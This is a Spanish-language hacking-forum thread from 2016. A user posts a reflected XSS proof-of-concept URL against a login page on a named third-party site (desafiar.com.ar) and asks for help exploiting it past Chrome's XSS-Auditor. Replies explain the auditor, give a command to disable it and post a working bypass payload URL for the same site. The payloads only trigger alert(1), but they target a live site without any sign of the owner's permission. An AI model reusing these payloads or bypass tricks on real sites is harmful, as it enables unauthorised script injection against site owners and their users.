Sólo texto | Texto con Imágenes

Underc0de - La Casa de los Informáticos

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: GGZ en Abril 23, 2016, 09:44:42 PM

Título: [SOLUCIONADO] desafiar.com.ar [DUDA: Bypassing ANTI-XSS Chrome]
Publicado por: GGZ en Abril 23, 2016, 09:44:42 PM
Buenas,

Hace como un mes encontré un XSS en la página mencionada anteriormente, intenté saltear el filtro Anti XSS de Chrome y pude!
Solamente que ahora lo arreglaron, lo que me lleva a la pregunta de que si ustedes me podrían ayudar a explotarlo.

PoC: http://desafiar.com.ar/uca/login.php?nombre=%22%3E%3Cscript%2Fsrc%3Ddata%3A%2Calert(1)%2B%22

Ese era el que funcionaba hace hace poco en Chrome.

Saludos!
Título: Re:[XSS] desafiar.com.ar [Bypassing ANTI-XSS Chrome]
Publicado por: rollth en Abril 23, 2016, 10:29:00 PM
A mi me sigue saltando el alert. :D
Título: Re:[XSS] desafiar.com.ar [Bypassing ANTI-XSS Chrome]
Publicado por: GGZ en Abril 24, 2016, 02:44:56 PM
Seguro tenés una versión desactualizada de Chrome entonces.
Título: Re:[XSS] desafiar.com.ar [Bypassing ANTI-XSS Chrome]
Publicado por: Jimeno en Abril 24, 2016, 03:18:30 PM
Quien detiene el XSS es el XSS-Auditor de Chrome, ellos no lo han fixeado.
Si ejecutas
Código (bash) [Seleccionar]
google-chrome --disable-xss-auditor verás que al acceder a la URL salta el alert. Pero por defecto Chrome tiene el XSS-Auditor activo y bloquea la ejecución del JS. Si accedes al código fuente verás que lo resalta y pone algo como "Found Reflected XSS token".

Aquí tienes el reporte original a Chromium para el bypass que utilizaste: https://bugs.chromium.org/p/chromium/issues/detail?id=117329
Para la última versión de Chrome no conozco bypass del XSS-Auditor, pero suelen ser bastante jodidos...
Título: Re:[XSS] desafiar.com.ar [Bypassing ANTI-XSS Chrome]
Publicado por: arthusu en Abril 24, 2016, 03:30:12 PM
http://desafiar.com.ar/uca/login.php?nombre=%22%3E%3Cscript%20src=data:%26comma;alert(1)-%22
Título: Re:[XSS] desafiar.com.ar [Bypassing ANTI-XSS Chrome]
Publicado por: Jimeno en Abril 24, 2016, 03:33:01 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
http://desafiar.com.ar/uca/login.php?nombre=%22%3E%3Cscript%20src=data:%26comma;alert(1)-%22

Ese es el del blog de brutelogic :)
Título: Re:[XSS] desafiar.com.ar [Bypassing ANTI-XSS Chrome]
Publicado por: GGZ en Abril 24, 2016, 03:54:56 PM
Jajaja, ¡gracias! ahí estaba estaba leyendo alguno de esos, gracias a todos!
Jimeno, ya sé que no arreglaron el XSS me refería a que solucionaron el fallo de Chrome porque antes esa URL tiraba el alert en Chrome después lo arreglaron.
Saludos!
Título: Re:[XSS] desafiar.com.ar [Bypassing ANTI-XSS Chrome]
Publicado por: arthusu en Abril 24, 2016, 08:53:51 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
http://desafiar.com.ar/uca/login.php?nombre=%22%3E%3Cscript%20src=data:%26comma;alert(1)-%22

Ese es el del blog de brutelogic :)
Asi es mi bro! C: y hay un monton mas XD
Sólo texto | Texto con Imágenes